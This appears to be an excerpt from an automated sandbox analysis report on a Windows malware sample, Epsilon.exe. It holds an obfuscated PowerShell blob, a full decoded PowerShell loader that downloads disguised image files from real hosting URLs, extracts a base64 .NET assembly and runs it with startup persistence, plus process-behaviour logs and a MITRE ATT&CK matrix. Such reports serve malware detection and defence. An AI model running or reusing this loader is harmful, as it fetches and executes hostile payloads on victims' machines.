Bm$GY$b$Bl$GQ$T$Bp$G4$awBz$Ck$I$B7$C$$d$By$Hk$I$B7$C$$cgBl$HQ$dQBy$G4$I$$k$Hc$ZQBi$EM$b$Bp$GU$bgB0$C4$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$K$$k$Gw$aQBu$Gs$KQ$g$H0$I$Bj$GE$d$Bj$Gg$I$B7$C$$YwBv$G4$d$Bp$G4$dQBl$C$$fQ$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$By$GU$d$B1$HI$bg$g$CQ$bgB1$Gw$b$$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$Gw$aQBu$Gs$cw$g$D0$I$B$$Cg$JwBo$HQ$d$Bw$HM$Og$v$C8$YgBp$HQ$YgB1$GM$awBl$HQ$LgBv$HI$Zw$v$Go$a$Bn$GY$a$Bo$Gs$agBl$GU$Z$Bl$GY$Z$Bm$C8$bQBu$GI$dgBn$Go$Z$Bn$C8$Z$Bv$Hc$bgBs$G8$YQBk$HM$LwB0$GU$cwB0$C4$agBw$Gc$Pw$1$DM$Nw$2$DE$MQ$n$Cw$I$$n$Gg$d$B0$H$$cw$6$C8$LwBy$GE$dw$u$Gc$aQB0$Gg$dQBi$HU$cwBl$HI$YwBv$G4$d$Bl$G4$d$$u$GM$bwBt$C8$ZwBt$GU$Z$B1$HM$YQ$x$DM$NQ$v$G4$YQBu$G8$LwBy$GU$ZgBz$C8$a$Bl$GE$Z$Bz$C8$bQBh$Gk$bg$v$G4$ZQB3$F8$aQBt$Gc$MQ$y$DM$LgBq$H$$Zw$n$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$Gk$bQBh$Gc$ZQBC$Hk$d$Bl$HM$I$$9$C$$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$H
M$I$$k$Gw$aQBu$Gs$cw$7$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$Gk$Zg$g$Cg$J$Bp$G0$YQBn$GU$QgB5$HQ$ZQBz$C$$LQBu$GU$I$$k$G4$dQBs$Gw$KQ$g$Hs$I$$k$Gk$bQBh$Gc$ZQBU$GU$e$B0$C$$PQ$g$Fs$UwB5$HM$d$Bl$G0$LgBU$GU$e$B0$C4$RQBu$GM$bwBk$Gk$bgBn$F0$Og$6$FU$V$BG$Dg$LgBH$GU$d$BT$HQ$cgBp$G4$Zw$o$CQ$aQBt$GE$ZwBl$EI$eQB0$GU$cw$p$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bz$HQ$YQBy$HQ$RgBs$GE$Zw$g$D0$I$$n$Dw$P$BC$EE$UwBF$DY$N$Bf$FM$V$BB$FI$V$$+$D4$Jw$7$C$$J$Bl$G4$Z$BG$Gw$YQBn$C$$PQ$g$Cc$P$$8$EI$QQBT$EU$Ng$0$F8$RQBO$EQ$Pg$+$Cc$Ow$g$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$g$D0$I$$k$Gk$bQBh$Gc$ZQBU$GU$e$B0$C4$SQBu$GQ$ZQB4$E8$Zg$o$CQ$cwB0$GE$cgB0$EY$b$Bh$Gc$KQ$7$C$$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$CQ$ZQBu$GQ$SQBu$GQ$ZQB4$C$$PQ$g$CQ$aQBt$GE$ZwBl$FQ$ZQB4$HQ$LgBJ$G4$Z$Bl$Hg$TwBm$Cg$J$Bl$G4$Z$BG$Gw$YQBn$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$Bp$GY$I$$o$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$g$C0$ZwBl$C$$M$$g$C0$YQBu$GQ$I$$k$GU$bgBk$Ek$bgBk$GU$e$$g$C0$ZwB0$C$$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$Ck$I$B7$C$$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$C$$Kw$9$C$$J$Bz$HQ$YQBy$HQ$RgBs$GE$Zw$u$Ew$ZQBu$Gc$d$Bo$D
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/jhgfhhkjeedefdf/mnbvgjdg/downloads/test.jpg?537611', 'https://raw.githubusercontent.com/gmedusa135/nano/refs/heads/main/new_img123.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.hckSkpo/sdaolnwod/rwqewqfqwf/qretretr/gro.tekcubtib', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -exec
        Source: C:\Users\user\Desktop\Epsilon.exe | Code function: 0_2_00007FF7378211CC LoadLibraryA,GetProcAddress,AllocateAndInitializeSid,FreeSid,FreeLibrary,0_2_00007FF7378211CC
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0513~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.StartLayout.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.Windows.StartLayout.Commands.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Whea\Microsoft.Windows.Whea.WheaMemoryPolicy.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsSearch\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WindowsSearch.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Epsilon.exeCode function: 0_2_00007FF737828964 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,GetTickCount,QueryPerformanceCounter,0_2_00007FF737828964
        Source: C:\Users\user\Desktop\Epsilon.exeCode function: 0_2_00007FF737822C54 GetVersion,GetModuleHandleW,GetProcAddress,ExitWindowsEx,CloseHandle,0_2_00007FF737822C54
        Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
        MITRE ATT&CK Matrix (digits preceding a technique name are the per-technique counts from the original matrix):

        Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
        Gather Victim Identity Information | 111 Scripting | Valid Accounts | 2 Command and Scripting Interpreter | 111 Scripting | 1 Access Token Manipulation | 21 Virtualization/Sandbox Evasion | OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 21 Encrypted Channel | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
        Credentials | Domains | Default Accounts | 12 Native API | 1 Registry Run Keys / Startup Folder | 11 Process Injection | 1 Access Token Manipulation | LSASS Memory | 1 Process Discovery | Remote Desktop Protocol | Data from Removable Media | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
        Email Addresses | DNS Server | Domain Accounts | 1 Exploitation for Client Execution | 1 DLL Side-Loading | 1 Registry Run Keys / Startup Folder | 11 Process Injection | Security Account Manager | 21 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
        Employee Names | Virtual Private Server | Local Accounts | 2 PowerShell | Login Hook | 1 DLL Side-Loading | 1 Obfuscated Files or Information | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction
